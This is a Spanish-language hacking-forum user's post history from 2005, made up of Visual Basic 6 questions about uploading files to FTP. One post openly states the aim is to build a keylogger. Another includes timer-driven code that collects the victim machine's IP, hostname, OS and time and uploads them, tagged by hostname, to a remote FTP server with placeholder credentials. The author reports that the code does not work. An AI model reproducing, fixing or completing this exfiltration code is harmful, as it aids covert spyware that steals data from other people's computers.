elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: [1]
1  Programación / Programación Visual Basic / Re: control Inet en: 9 Agosto 2005, 01:53 am
Hola soy nuevo y me gustaria aprender mas .... como hacer para subir a un archivo mediante un programa en visual........blinski podrias poner tu codigo final osea todo el kodigo....no con la intencion de copiarlo y pegarlo sino para estudiarlo ayudenme porfavor

espero entiendan
salu2
2  Programación / Programación Visual Basic / Re: Aplicacion en VB 6.0 ... subir a FTP :s en: 6 Agosto 2005, 21:21 pm
Hola de nuevo la verdad es k he tratado de hacer lo k dicen pero no me ha funcionado ........speed no c ti tu podrias postear tu codigo final y el cual funciono .....no quiero para copy y paste lo quiero estudiar y ver mis errores recien comienzo en esto por eso necesito ayuda .....gracias desde ya salu2
3  Programación / Programación Visual Basic / Re: Aplicacion en VB 6.0 ... subir a FTP :s en: 4 Agosto 2005, 23:14 pm
Bueno ya entendi lo que me kiso decir manibal_man Pero quiero aprender y kisiera k  me ayuden por ultima vez-------------alwar podrias postear el kodigo final que a ti te funciono ????? no es para copy y paste si no para estudiarlo graciass
4  Programación / Programación Visual Basic / Re: Aplicacion en VB 6.0 ... subir a FTP :s en: 2 Agosto 2005, 22:53 pm
soy nuevo en esto del vb pero si he entendio algo pero acerca del ejemplo anterior de subir un archivo prueba.txt a un ftp no me sube nada ni sikierame conecta.......el kodigo k uso es este
Código:
Dim ti
--------------------------------------------------------------------------
Private Sub Form_Load()
On Error GoTo error
Form1.Visible = True
ti = 0
Timer1.Interval = 100
error:
End Sub
--------------------------------------------------------------------------
Private Sub Command1_Click()
On Error GoTo error
ti = ti + 1
Label1.Caption = ti
If ti = 10 Then
Open "prueba.txt" For Output As #1
Print #1, "ip del host . . . . . :", Winsock1.LocalIP
Print #1, "host. . . . . . . . . :", Winsock1.LocalHostName
Print #1, "plataforma. . . . . . :", SysInfo1.OSPlatform
Print #1, "fecha . . . . . . . . :", Date
Print #1, "hora. . . . . . . . . :", Time
Close #1
Inet1.URL = "ftp://MiFtp.es"
Inet1.UserName = "ElUsuario"
Inet1.Password = "ElPass"
inet1.execute , "put c:\prueba.txt /prueba" & winsock1.localhostname & ".txt"     'para que sea diferente al ejecutarlo de diferente makina
End If
error:
End Sub
--------------------------------------------------------------------------
Private Sub Timer1_Timer()
On Error GoTo error
Call Command1_Click
error:
End Sub

ahme olvidava ahi pongo un boton de command , un control timer y un label nada mas verdad o me falta alguno ?????
Haber si me dan una manito graxias
5  Programación / Programación Visual Basic / Como hacer enviar un texto a un ftp en: 22 Mayo 2005, 23:26 pm
HOlas..mi duda es como podria hacer para enviar un archivo de texto hacia un ftp cada cierto tiempo ....necesito esa info para hacer un keylogger y si conocen alguno diganmelo ;)
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines